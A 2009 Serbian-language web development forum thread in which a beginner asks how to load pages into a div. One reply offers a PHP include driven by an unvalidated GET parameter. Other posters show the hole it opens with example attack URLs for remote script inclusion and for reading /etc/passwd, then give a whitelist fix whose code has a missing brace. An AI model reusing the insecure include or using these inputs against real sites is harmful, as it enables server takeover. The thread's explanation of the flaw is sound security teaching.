[ achris @ 05.05.2009. 20:29 ] @
Pozdravljam svakog...

Vec skoro 2 meseca tragam na netu za resenje ali nikako da ga nadjem.

Hocu da napravim web stranicu sa HTML i CSS tehnikom sa opcijom da u jednom DIV-u imam jedan red menia a u drugom DIV-u
da se ucita odgovarajuci .html file ili .php file u zavisnosti sta je kliknuto u prvom DIV elementu.
Nesto kao ovo na www.code-elektronic.com/index2.html ali nisam zadovoljan sa ovim jel ako smanjim ekran svog pretrazivaca za 50%
dobijem jedan jako gadan efekat,proverite i sami...

Kada ucitate stranicu kliknite na proizvodi pa na recimo racunari. To je to sto zelim da uradim ali bez toga da mi se stranica skroluje
ukoliko je velicina prozora pretrazivaca manje nego sama stranica odnosno ukoliko je rezolucija ekrana razlicita od 1280x1024.

Imali neko nekakvo resenje kako da resim ovo ucitavanje?
[ Nemke_BG @ 06.05.2009. 12:17 ] @
Ako vec zelis ovako nesto, zasto onda nebi to izveo sa ajax-om ili ako ti je bas zapelo da ne bude klijent - server komunikacije, napisi neku malu JS funkciju koja ce da radi show/hide divova na toj strani i to je to....

P.S. Ako jos i dodas u tu kombinaciju na primer JQuery mozes da napravis i neku finu animaciju veoma jednostavno koja ce jos i da radi u svim browserima...
[ achris @ 06.05.2009. 12:41 ] @
Posto sam nov u CSS dao si mi jako dobru ideju! puno ti hvala druze.

Jel bi mi mogao dati neki link mozda ako znas ili source da vidim kako to tacno izgleda
posto sa javom ne stojim najbolje ali bi mozda uspeo sa php-om,to mi bolje lezi,vise prakse imam u njemu...

Dali neko moze da mi kaze ako hocu da koristim cist HTML i CSS na koji nacin je najbolje zaobici iFrame tag a
pri tome imati te osobine kao iFrame?
Tu mislim da mogu da ucitam druge stranice u postojeci DIV ali bez iFrame-a.

[Ovu poruku je menjao achris dana 06.05.2009. u 14:14 GMT+1]
[ Nemke_BG @ 07.05.2009. 00:03 ] @
Preko HTML - a i CSS - a ne mozes tako nesto da uradis...sve to mora da ide preko JavaScript-a(koji nije isto sto i Java)....sto se tice primera idi na www.jquery.com i imas tu jedan primer koriscenja odmah na pocetnoj...pronjuskaj po dokumentaciji i videces jos dosta primera....takodje ne bi bilo lose da se malo bolje upoznas sa osnovama JavaScript-a pre nego krenes u rad sa jQuery-jem, to mozes i preko www.w3schools.com, cisto da steknes uvid u sam JavaScript.....ili imas ovde u top temi link ka odlicnom tutorialu koji je Aleksandar postovao pa pogledaj i njega.....

[ achris @ 07.05.2009. 02:05 ] @
Hvala ti puno druze na savet.Pogledacu sve sto si preporucio.
[ vatri @ 07.05.2009. 22:13 ] @
Ne znam zasta ti ovo treba, ali jesi li razmisljao pomocu php-a da ovo odradis.

Mozda ti ovako nesto moze pomoc:

stavis linkove ovako <a href="?strana=prva">Prva strana</a>

a dole gdje zelis da se ucitavaju strane stavis:

Code:

<?php

$str = $_GET['strana'];

include $str.'.php';

?>


A zatim sacuvas novi fajl kao prva.php u kojoj ce se nalaziti sadrzaj kad se klikne na gore pomenuti link i tako i sa ostalim stranama.
[ japan @ 07.05.2009. 23:30 ] @
au au au...

pa to je skoro kao da si ostavio root password u footeru sajta :)
[ vatri @ 08.05.2009. 09:26 ] @
Sto?
[ Nemke_BG @ 08.05.2009. 10:53 ] @
pa zato sto onda moze da se uradi nesto ovog tipa...

Code:
www.nekisajt.com/?strana=http://www.hakeri.org/hakuj_mi_sajt_molim_te
[ defufna @ 08.05.2009. 11:51 ] @
Dobro, ali uz male modifikacije Vatri-jeva ideja ima smisla :) Jedino sto ces dobiti reload cele stranice..
[ vatri @ 08.05.2009. 12:19 ] @
Pa dobro jbg :)

Onda ocistis $str sa recimo preg_match() pa dozvolis samo slova?

edit:

A kad smo vec kod tog hakovanja, na koji nacin sad to radi? Sta se desava kad upisemo ovo sto je Nemke upisao?
[ japan @ 08.05.2009. 15:00 ] @
desava se to da je, sem toga sto ti hoces da inkludujes, moguce inkludovati bilo koji skript, najcesce neki shell. u primeru koji je dao nemke, to je "hakuj_mi_sajt_molim_te", skripta koja je hostovana na nekom drugom serveru, i u kojoj moze da stoji sta god ti padne na pamet. granice mogucnosti su granice maste :)

da li ce ovo da radi, zavisi i od podesavanja tvog servera (mislim da se php.ini direktiva zove "allow_url_include"), i ne mora da znaci da ce uspeti, ali je ovo skolski primer lose prakse.

ako vec hoces na taj nacin da inkludujes, onda obavezno odradis proveru.

Code:

if ($str === 'prva')
{
   include('prva.php');

else if ($str === 'druga')
{
   include('druga.php');
}
else
{
   echo 'strana nije pronadjena';
}
[ vatri @ 08.05.2009. 16:01 ] @
A kad bi iskljucili allow_url_include pomocu fje. ini_set() da li je onda bezbjedno?
[ defufna @ 09.05.2009. 19:48 ] @
Ne potpuno, i dalje moze da trigeruje include koji ti je hostovan na sajtu, to moze biti manje opasno, ali moze biti i jako opasno ako takodje imas neku mogucnost da korisnik uploaduje file na server.. U sustini kad god uzimas bilo kakve podatke od korisnika, treba da ih tretiras sa maksimalnom paranojom..
[ japan @ 09.05.2009. 23:57 ] @
u ovom konkretnom slucaju nije tako opasno, jer se kroz kod dodaje ekstenzija '.php', tako da je inkludovanje ograniceno samo na fajlove sa tom ekstenzijom (mislim da se ovo samo kroz GET parametar nikako ne moze zaobici), ali da nema tog ogranicenja, onda bi mogao da se inkluduje bilo koji fajl sa servera, npr:
Code:
http://imesajta/skripta.php?strana=/etc/passwd

Citat:
kad god uzimas bilo kakve podatke od korisnika, treba da ih tretiras sa maksimalnom paranojom..
[ achris @ 10.05.2009. 09:52 ] @
Kolege pratim Vas sta se ovde desava,mogu Vam reci da ste m i puno pomogli.To je ono sto trazim vec mesecima po netu.
Bravo i hvala.
E sada,dali imamo neki bezbedan i efikasan nacin ucitavanje mog problematicnog menua? :-)

Evo jedan primer koji sam ja probao da odradim sa INCLUDE komandom a mislim da je ok. Neka me neko ispravi ili doda ili oduzme ako ima nesto...
Kritike i savete uvek prihvatam.

Code:


<body>
<div id="menu" class="menu">
<?php include ("menu.txt"); ?>
</div>
</body>


U ovom slucaju sam u odredjeni div-u izgled formirao sa CSS a u eksterni menu.txt file upisao jedan
ispod drugog nazive menie koje sam zeleo da mi se ucitaju u div.
Dobio sam jednostavnu mogucnost promena sadrzaja menia recimo sto mi je vrlo vazno.

Kasnije sam uzeo i php-om iscitao red-po red i formirao html...da ne duzim....

Znaci,sta je najbolje da uradim da bi mi menu funkcionisao kako valja koje se vidi na
www.code-elektronic.com/index2.html pa kliknemo na "Proizvodi" pa "Mobilni Telefoni" ili "Racunari"
posto je ovaj trenutni meni uradjen sa "anchor" fazonom i sakriven je u jednom div-u.Problem ovoga je
to sto ako je rezolucija ekrana manja od moje gde sam razvijao ovo onda dobijem skakanje stranice u browseru.
Bas ruzno izgleda... :-(
Hvala puno na sugestije,pomoci...

Pozdravljam.


[Ovu poruku je menjao achris dana 11.05.2009. u 02:11 GMT+1]

[Ovu poruku je menjao achris dana 11.05.2009. u 02:54 GMT+1]